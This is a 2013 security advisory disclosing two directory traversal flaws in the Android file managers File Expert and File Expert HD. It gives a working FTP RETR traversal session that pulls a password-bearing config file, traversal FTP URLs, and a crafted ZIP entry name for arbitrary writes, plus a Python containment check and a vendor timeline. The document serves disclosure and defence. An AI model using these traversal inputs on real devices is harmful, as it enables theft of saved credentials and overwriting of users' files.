by Tan Chew Keong
Release Date: 2013-06-21
Summary
Two directory traversal vulnerabilities have been found in GeekSoft File Expert and File Expert HD. When exploited, these vulnerabilities allow an attacker to gain access to the application's configuration files or to write files to arbitrary locations within the SD card of the user's Android device.
Tested Versions
Details
This advisory discloses two directory traversal vulnerabilities in GeekSoft File Expert and File Expert HD. When exploited, these vulnerabilities allow an attacker to gain access to the application's configuration files or to write files to arbitrary locations within the SD card of the user's Android device.
Vulnerability 1 - Directory Traversal in FTP Server
The FTP server does not properly sanitise FTP requests containing directory traversal sequences (forward-slash ../) in their filenames. This can be exploited by authenticated malicious attackers to download the application's configuration files which can contain the user's saved passwords.
An example of a malicious FTP request is shown below.
C:\>ncat 192.168.1.102 2211
220 File Expert FTP Server for Android Froyo Ready
USER username
331 Send password
PASS passsword
230 Access granted
PORT 192,168,1,100,164,25
200 PORT OK
RETR /../../../../../../data/data/xcxin.fehd/shared_prefs/FE_SMB_SERVER.xml
150 Sending file
226 Transmission finished
Vulnerability 2 - Directory Traversal in ZIP Extraction
When extracting compressed files from a ZIP archive, the ZIP extraction functionality does not properly sanitise compressed files that have directory traversal sequences in their filenames. By tricking a user into extracting a specially crafted ZIP archive containing files with directory traversal sequences in their filenames, an attacker can potentially write files to arbitrary locations within the SD card of the user's Android device.
For example, a malicious ZIP archive can contain a compressed file with the following filename:
/../../../../../../../../mnt/sdcard/DCIM/zipPOC.txt
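As an added example (not code from the advisory or from GeekSoft), the containment check that both Vulnerability 1 and Vulnerability 2 are missing, written in Python: a RETR argument or a ZIP entry name is normalised against its root directory and rejected when the result lands outside that root. The share root, the extraction directory and the archive contents are constructed values for the demonstration.

```python
import io
import posixpath
import zipfile

# Constructed example roots (not taken from the advisory's test setup): the
# FTP share root and the directory a ZIP is being extracted into.
FTP_ROOT = "/mnt/sdcard"
EXTRACT_DIR = "/mnt/sdcard/Download/FileExpertPOC"


def resolve_inside(root, requested):
    """Return the absolute path for `requested` if it stays under `root`,
    else None. This is the check both the FTP RETR handler and the ZIP
    extractor are missing: normalise first, then test containment."""
    root = posixpath.normpath(root)
    # Treat every request as relative to the root, even if it begins with '/',
    # then collapse every '..' and '.' component.
    resolved = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    # Compare with a trailing separator so '/mnt/sdcard2' cannot pass as
    # a child of '/mnt/sdcard'.
    if resolved == root or resolved.startswith(root + "/"):
        return resolved
    return None


def safe_extract(zip_bytes, dest):
    """Walk an archive and split its entries into those that resolve inside
    `dest` and those that would escape it. Returns (accepted, rejected)."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = resolve_inside(dest, name)
            if target is None:
                rejected.append(name)
                continue
            accepted.append(target)
            # A real extractor would write zf.read(name) to `target` here.
    return accepted, rejected


def build_test_zip():
    """Constructed archive: one benign entry plus one entry named like the
    traversal filename quoted in the advisory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("FileExpertPOC/readme.txt", "benign")
        zf.writestr("/../../../../../../../../mnt/sdcard/DCIM/zipPOC.txt", "escapes")
    return buf.getvalue()
```

The same resolve-then-compare step applies to the RETR argument shown in the FTP session above; a check that only blocks a literal CWD .. command, as the advisory notes the server does, leaves the RETR path unchecked.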
POC / Test Code
The instructions below illustrate how this vulnerability can be reproduced using File Expert HD. The steps for reproducing the vulnerability on File Expert are very similar and hence will not be repeated.
Instructions for testing FTP Server (Vulnerability 1):
- Start the FTP Server in File Expert HD on an Android device.
- Use the Firefox browser to access the FTP Server and confirm that some basic directory traversal protection exists, i.e. the CWD .. command is blocked.
- Now, use the FTP Server directory traversal vulnerability to access File Expert HD's data folder by navigating directly to the following FTP URL containing directory traversal sequences. Note: Change the IP address in the URL to the IP address of your Android device.
ftp://192.168.1.102:2211/../../../../../../data/data/xcxin.fehd/shared_prefs/
Or, the following if you are testing using File Expert
ftp://192.168.1.102:2211/../../../../../../data/data/xcxin.filexpert/shared_prefs/
- Download the FE_SMB_SERVER.xml file and note that it contains the user's FTP client password if the user has configured FTP client settings in File Expert HD.
- By exploiting this vulnerability, an authenticated malicious attacker can download the application's configuration files, which can contain the user's saved passwords.
Instructions for testing ZIP extraction (Vulnerability 2):
- Please download the POC ZIP archive here and follow the instructions below.
- Copy the POC ZIP archive into the Download directory of your Android device.
- IMPORTANT: Ensure that the /mnt/sdcard/DCIM/ directory exists on your Android device in order for the POC to work.
- Decompress the POC ZIP archive into the current path.
- When the extraction completes, navigate to the /mnt/sdcard/DCIM directory. You'll notice that zipPOC.txt has been extracted into /mnt/sdcard/DCIM/zipPOC.txt instead of into /mnt/sdcard/Download/FileExpertPOC/zipPOC.txt.
Hence, by tricking a user into extracting a specially-crafted ZIP archive, an attacker can potentially exploit this issue to write files into arbitrary locations within the SD card of the user's Android device, or to overwrite files in known locations within the SD card.
For example, an attacker who knows the filenames of the user's photos in the /mnt/sdcard/DCIM/ directory can exploit this vulnerability to overwrite the user's photo files.
Patch / Workaround
Do not allow untrusted persons to access your FTP file share and avoid extracting untrusted ZIP files.
Disclosure Timeline
2013-05-26 - Vulnerability Discovered.
2013-05-26 - Initial Vendor Notification.
2013-05-27 - Vulnerability Details Sent to Vendor.
2013-05-31 - Asked vendor for release date of fixed version (no reply).
2013-06-05 - Asked vendor for release date of fixed version (no reply).
2013-06-11 - Asked vendor for release date of fixed version (no reply).
2013-06-13 - Vendor replied that they are still working on it and will release update later in the week.
2013-06-19 - Vendor released File Expert version 5.2.0 and File Expert HD 1.0.5.
2013-06-19 - Tested new versions and found that the vulnerability is not fixed.
2013-06-21 - Public Release.